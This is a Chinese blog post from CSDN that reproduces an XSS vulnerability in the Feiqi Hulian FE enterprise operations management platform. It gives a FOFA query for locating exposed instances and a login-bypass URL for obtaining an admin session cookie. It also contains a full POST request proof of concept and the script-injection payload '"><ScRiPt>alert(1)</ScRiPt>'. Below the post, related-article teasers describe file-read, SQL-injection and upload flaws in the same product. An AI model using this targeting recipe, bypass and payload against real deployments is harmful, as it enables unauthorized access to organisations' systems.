飞企互联-FE企业运营管理平台XSS漏洞

已于 2024-08-15 22:09:20 修改
阅读量314 收藏 5
点赞数 7
文章标签: xss 前端
于 2024-07-29 11:23:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/140764990
版权

漏洞简介

 飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。该系统存在xss跨站脚本漏洞

FOFA:app="飞企互联-FE企业运营管理平台"

后台XSS配合登录绕过漏洞使用

获取cookie

/loginService.fe?op=D #IP+/loginService.fe?op=D

访问后台地址

/main/main.jsp # IP+/main/main.jsp

漏洞复现

POC:

POST /main/1722223262484_995-005-000.do HTTP/1.1
Host: 
Content-Length: 976
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/main/fe.do?SYS.ID=995-005-000&A1722223227181=1722223227181
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=5CC95B911E4741A3720A86164D5F13F2
Connection: keep-alive

master_key=&FE_VERSION=0&SYS.ACTION=one&BEFORE_SYS_ACTION=one&currentDateParam=2024-07-29+11%3A21%3A02&mediaStyle=1&WEB_MEDIA_SERVER=%2Fmeida%2FOfficeServer.jsp&faceID=405&SysTableName=.FE_BASE5.SYS_USERS&SYS_SUBFLOW_GUID=&searchType=&searchKey=%22%3E%3CScRiPt%3Ealert%281%29%3C%2FScRiPt%3E&query_string=&searchKeyvalue=%22%3E%3CScRiPt%3Ealert%281%29%3C%2FScRiPt%3E&SU01=system&SU02=%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%91%98&SU03=%E7%BB%8D%E5%85%B4%E6%9F%AF%E6%A1%A5%E5%8B%A4%E4%B8%9A%E7%BD%AE%E5%9C%B0%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&SU08=1&orderby=&desc=asc&TABLE_LIST_PAGE=FE_BASE5_SYS_USERS&FE_BASE5_SYS_USERS_ROWS=0&sys_filter=%2528su31%253D%25272%2527%2Band%2Bsu01%253C%253E%2527admin%2527%2529&size=25&current=1&displayList=1%2C1%2C1%2C1&fieldList=SU01%2CSU02%2CSU03%2CSU08&fieldNameList=%E7%99%BB%E5%BD%95%E5%90%8D%E7%A7%B0%2C%E7%94%A8%E6%88%B7%E6%8F%8F%E8%BF%B0%2C%E5%85%B3%E8%81%94%E5%8D%95%E4%BD%8D%2C%E5%90%AF%E7%94%A8&displayListNew=&_MASTERSTAMP=AA%3D%3D

首页 点击管理员设置

插入Payload

"><ScRiPt>alert(1)</ScRiPt>

 成功弹窗

摸金校尉-马
关注
飞企互联FE业务协作平台 ProxyServletUti 任意文件读取漏洞复现
0xSec
04-16 745
飞企互联 FE 业务协作平台 ProxyServletUti 接口存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
飞企互联-FE企业运营管理平台 videotexMonitor SQL注入漏洞复现
0xSec
01-31 847
飞企互联-FE企业运营管理平台 videotexMonitor接口存在SQL注入漏洞,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。
漏洞复现】飞企互联-FE企业运营管理平台 uploadAttachmentServlet—文件上传漏洞
最新发布
weixin_54799594的博客
07-13 1982
漏洞复现记录
飞企互联-FE企业运营管理平台管理员权限登录绕过漏洞复现
qq_39573664的博客
12-29 898
飞企互联FE企业运营管理平台存在一个潜在的安全漏洞,涉及到2.ln接口的登录绕过问题。未经授权的攻击者可以通过构造恶意的URL访问页面,直接进入后台管理页面,获取敏感信息。这种漏洞可能为攻击者提供了进一步控制整个服务器的机会,对系统的安全性构成潜在威胁。
漏洞复现】飞企互联-FE企业运营管理平台——uploadAttachmentServlet——文件上传
LongL_GuYu的博客
07-10 1091
飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。其`uploadAttachmentServlet`存在文件上传漏洞,导致恶意攻击者可以上传恶意后门、木马等,从而获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
007-Web安全基础3 - XSS漏洞.pptx
10-22
007-Web安全基础3 - XSS漏洞
(华科企业网站管理系统)hkqyglxt-含有存储型XSS漏洞的源码包.rar
03-24
【标题】"(华科企业网站管理系统)hkqyglxt-含有存储型XSS漏洞的源码包.rar" 暴露了重要的网络安全问题,主要关注的是存储型跨站脚本( Stored XSS漏洞。这个标题暗示了该源码包在设计时存在一个关键的安全缺陷,...
DedeCMS 存储型xss漏洞1
08-03
【DedeCMS 存储型 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源网站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建网站。然而,如同任何软件一样,DedeCMS 也存在安全...
专题资料(2021-2022年)FE企业运营管理平台V65发版说明v1.doc
10-07
专题资料
0day-飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传漏洞
weixin_43167326的博客
03-22 1216
飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。这个平台可以连接人、链接端、联通内外,支持企业B2B、C2B与O2O等核心需求,为不同行业客户的互联网+转型提供支持。其特色在于提供云端工作环境,整合了人工智能、大数据分析和物联网设备管理,为不同行业客户的互联网+转型提供全面支持。通过智能化的决策支持和数据驱动的业务优化,企业可以更灵活、高效地运营业务,实现数字化转型的战略目标。
飞企互联FE业务协作平台ShowImageServlet接口任意文件读取漏洞
xiaokp7的博客
09-13 814
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台飞企互联 FE 业务协作平台存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 954
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
漏洞复现】飞企互联FE企业运营管理平台 uploadAttachmentServlet 任意文件上传漏洞
https://blog.echo234.cn/
03-25 835
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台飞企互联FE业务协作平台uploadAttachmentServlet 任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
【1day】复现飞企互联 FE业务协作平台 ShowImageServlet 接口任意文件读取漏洞
记录并分享学习安全的知识点..
08-22 557
飞企互联Feiqi Hulian)是一家提供FE(Front End)业务协作平台的公司。FE业务协作平台是针对前端开发团队而设计的工具,旨在提高团队协作效率、优化工作流程,并支持团队成员之间的沟通和协作。飞企互联 FE业务协作平台 ShowImageServlet 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件。
飞企互联FE业务协作平台 ShowImageServlet 文件读取漏洞复现
0xSec
12-21 1137
飞企互联 FE 业务协作平台ShowImageServlet接口存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
【0day】复现飞企互联 FE业务协作平台 某接口任意文件读取漏洞
记录并分享学习安全的知识点..
10-16 452
飞企互联Feiqi Hulian)是一家提供FE(Front End)业务协作平台的公司。FE业务协作平台是针对前端开发团队而设计的工具,旨在提高团队协作效率、优化工作流程,并支持团队成员之间的沟通和协作。飞企互联 FE业务协作平台某接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件。
飞企互联-FE企业运营管理平台 多处登录绕过漏洞复现
0xSec
12-28 1822
飞企互联-FE企业运营管理平台2.ln、loginService.fe等接口处存在登录绕过漏洞,未授权的攻击者可构造恶意的url访问页面,可直接进入后台管理页面,获取敏感信息,进一步利用可控制整个服务器。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值